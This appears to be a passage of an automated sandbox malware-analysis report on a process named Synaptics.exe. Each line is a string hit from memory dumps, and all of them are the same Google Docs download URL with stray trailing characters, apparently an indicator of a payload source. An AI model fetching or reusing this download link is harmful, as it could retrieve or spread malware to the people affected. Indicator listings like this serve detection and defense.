                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE.xls
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3102248481.000000003DB63000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000863000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFranc
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG/
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG1
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG4
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGM
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIE.x
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIf
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ0
                                Source: Synaptics.exe, 00000008.00000003.2026291010.00000000075D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJS
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK.
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK0
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLM
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLtU
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3025439050.000000001E142000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMx
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNEQB
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadName
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO-
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO7
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP0p0
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQN
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQd
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026291010.00000000075FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadResol
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS)
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS1
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS3
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS6
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSe
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTAGVDv
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTh
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUTZ
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUsers
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVX3
